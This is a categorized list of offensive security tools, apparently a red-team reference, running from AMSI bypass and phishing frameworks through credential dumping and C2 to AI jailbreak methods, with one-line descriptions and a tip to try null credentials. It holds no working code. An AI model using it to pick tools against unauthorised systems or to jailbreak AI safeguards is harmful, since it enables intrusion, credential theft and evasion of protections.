Defense Evasion

RepositoryDescription
Amsi-Bypass-PowerShellAMSI bypasses (most are patched, but can be obfuscated to bypass)
AMSITriggerFinds which string(s) trigger AMSI
chameleonPowerShell script obfuscator
Invisi-ShellUsed to bypass PowerShell security (logging, AMSI, etc)
Invoke-ObfuscationPowerShell script obfuscator
ISESteroidsPowerShell script obfuscator
Invoke-StealthPowerShell script obfuscator
UPXPE packer
UnprotectContains malware evasion techniques along with PoC

OSINT

RepositoryDescription
CloudmareCloudflare, Sucuri, Incapsula real IP tracker
crt.shFind certificates based on a domain name. Can be used to find subdomains
DorkSearchPremade Google dork queries
ExifToolRead (and modify) metadata of files
FaceCheck.IDReverse image lookup based on facial-recognition
HunterFind company email format and list of employee email addresses
osintframeworkAn online database of OSINT tools
PimEyesReverse image lookup based on facial-recognition
Recon-NGReconaissance and OSINT framework. Has many modules such as port scanning, subdomain finding, Shodan, etc
ScrapeInScrapes LinkedIn to create a list of employee email addresses (for use in Initial Access)
SecurityTrailsExtensive DNS information
ShodanScans for all digital assets
SpiderFootAutomatic OSINT analysis
TheHarvesterCollects names, emails, IPs, and subdomains of a target

Reconaissance

RepositoryDescription
altdnsSubdomain enumeration using mutated wordlists
AutoReconMulti-threaded network reconnaissance tool which performs automated enumeration of services
AWSBucketDumpEnumerate AWS S3 buckets to find interesting files
CameRadarCameradar hacks its way into RTSP videosurveillance camera
CloudBruteEnumerates “the cloud” (Google, AWS, DigitalOcean, etc) to find infrastructure, files, and apps for a given target
dirbWeb application directory / file fuzzer to find other pages
DNSDumpsterOnline tool for DNS information of a domain
feroxbusterWeb application directory / file fuzzer to find other pages
gobusterWeb application directory / file fuzzer to find other pages, and support for DNS and vhost fuzzing
GoWitnessScreenshots webpages. Supports multi-domain lists and Nmap output
NiktoWeb server scanner to perform security checks on a web server
NmapFinds open ports on a network. Additionally can detect version, OS, and more
Recon-NGReconaissance and OSINT framework. Has many modules such as port scanning, subdomain finding, Shodan, etc
subfinderPassive subdomain discovery tool
wappalyzerIdentify what frameworks a website runs
wpscanAutomatic WordPress scanner to identify information about a WordPress site and possible vulnerabilities

Social Engineering

RepositoryDescription
evilginxStandalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
GoPhishPhishing campaign framework to compromise user credentials.
msfvenomGenerate malicious payloads for social engineering (ie: VBA, .exe, etc)
Social Engineering ToolkitSocial engineering framework.
SpoofCheckChecks if a domain can be spoofed.
zphisherPhishing campaign framework to compromise user credentials.

Leaked Credentials

RepositoryDescription
BreachDirectoryLeaked credential search engine
DehashedLeaked credential search engine
IntelxLeaked credential search engine
LeakCheckLeaked credential search engine
SnusbaseLeaked credential search engine

Web Exploitation

RepositoryDescription
ArachniWeb Application Security Scanner Framework
burpsuiteFull web testing suite, including proxied requests.
CaidoFull web testing suite, including proxied requests. (Like Burp but written in Rust)
dirbWeb application directory/file fuzzer.
dotGitA Firefox and Chrome extension that shows you if there is an exposed .git directory
feroxbusterWeb application directory/file fuzzer.
flask-unsignDecode, bruteforce, and craft Flask session tokens.
gobusterWeb application directory/file/DNS/vhost fuzzing.
NiktoWeb server scanner to perform security checks on a web server.
PayloadsAllTheThingsUseful payloads for a variety of attacks such as SQLi, IDOR, XSS, etc.
sqlmapPerforms automated SQL injection tests.
w3afWeb application attack and audit framework.
wappalyzerIdentify what frameworks a website runs.
wpscanAutomatic WordPress scanner to identify information about a WordPress site and possible vulnerabilities.

Wireless

RepositoryDescription
Aircrack-ngAircrack-ng is a complete suite of tools to assess WiFi network security
Kismetsniffer, WIDS, and wardriving tool for Wi-Fi, Bluetooth, Zigbee, RF, and more
ReaverReaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases
WifitePython script to automate wireless auditing using aircrack-ng tools
WifiPhisherThe Rogue Access Point Framework

Initial Access

RepositoryDescription
EasysploitAutomatic Metasploit payload generator and shell listener
ImpacketA tool to perform Kerberos pre-auth bruteforcing (ASREP roast) via GetNPUsers.py
KerbruteA tool to perform Kerberos pre-auth bruteforcing (ASREP roast)
MedusaBruteforcer with multiple protocol support.
MetasploitExploit framework that can be used for intial access and/or post-exploitation.
NetExecBruteforce common Windows protocols (WinRM, LDAP, RDP, SMB, WMI, etc.). Try username null or '' and password '' for unauthenticated access.
SearchsploitSearch ExploitDB for exploits
TeamFiltrationCross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
THC-HydraBruteforcer with multiple protocol support
TREVORsprayAdvanced password spraying tool for Active Directory environments

C2 Frameworks

C2 frameworks can be considered both initial access and post-exploitation, as they generate payloads to be used in phishing campaigns (initial access) and will provide access to the host machine when ran (post exploitation).

RepositoryDescription
Cobalt StrikeMost robust and advanced C2 framework (also paid)
PupyPython and C C2 framework
SliverGo C2 framework.
VillainPython and Powershell C2 framework

Post Exploitation

Modules for lateral movement, exfiltration, system enumeration, and more.

RepositoryDescription
BloodHoundActive Directory visualizer, useful for finding misconfigurations and/or shortest path to Domain Admin
BloodHound.pyRemote Python data ingestor for BloodHound
ImpacketA collection of Python scripts useful for Windows targets: psexec, smbexec, kerberoasting, ticket attacks, etc
MimikatzMimikatz is both an exploit on Microsoft Windows that extracts passwords stored in memory and software that performs that exploit
nishangOffensive PowerShell for red team, penetration testing and offensive security
PowerHubPost-exploitation module for bypassing endpoint protection and running arbitrary files
PowerSploitA PowerShell post-exploitation framework with many modules: exfiltration, privelege escalation, etc
SharpHoundC# data ingestor for BloodHound. (Recommend SharpHound.ps1 for Bloodhound Kali version)

Privilege Escalation

These tools automatically enumerate current user privileges and try to find misconfigurations that would allow escalation to root and/or NT AUTHORITY\SYSTEM.

RepositoryDescription
BeRootAutomated Windows, Linux, and Mac privilege escalation path discovery tool
GTFOBinsUnix binaries that can be used to bypass local security restrictions in misconfigured systems
Invoke-PrivescCheckAutomated Windows privilege escalation path discovery tool
PEASS-ngAutomated Windows, Linux, and Mac privilege escalation path discovery tool
PowerUpAutomated Windows privilege escalation path discovery tool

Exfiltration

Data exfiltration

RepositoryDescription
DNSExfiltratorData exfiltration over DNS request covert channel

Credential Dumping

These tools help dump cached credentials from a system.

RepositoryDescription
certsyncDump NTDS with golden certificates and UnPAC the hash
DumpertLSASS memory dumper using direct system calls and API unhooking
ImpacketDump domain credentials via DCSync or from NTDS.DIT/SAM with secretsdump.py
MimikatzDump local and domain credentials with sekurlsa, lsadump modules

Password Cracking

These tools assist in uncovering passwords, whether it be for a hash or for password spraying attempts.

RepositoryDescription
CeWLScrape websites to generate wordlists
crunchGenerate wordlists based on requirements such as minimum and maximum length, character sets, etc
CuppUtilize OSINT to create password candidates for a specific person
hashcatPassword cracking tool
JohnTheRipperPassword cracking tool
MentalistA GUI for wordlist generation based on rules such as appending, prepending, etc

AI / LLM

This section will probably be outdated quick.

RepositoryDescription
HarmBenchA standardized evaluation framework for automated red teaming and robust refusal
Adversarial SuffixJailbreak based on prepending a potentially malicious query
AutoDAN-TurboBlack-box jailbreak method that can automatically discover as many jailbreak strategies as possible from scratch
Best-of-NBlack-box algorithm that jailbreaks frontier AI systems across modalities (text, image, vision) by mutating the original query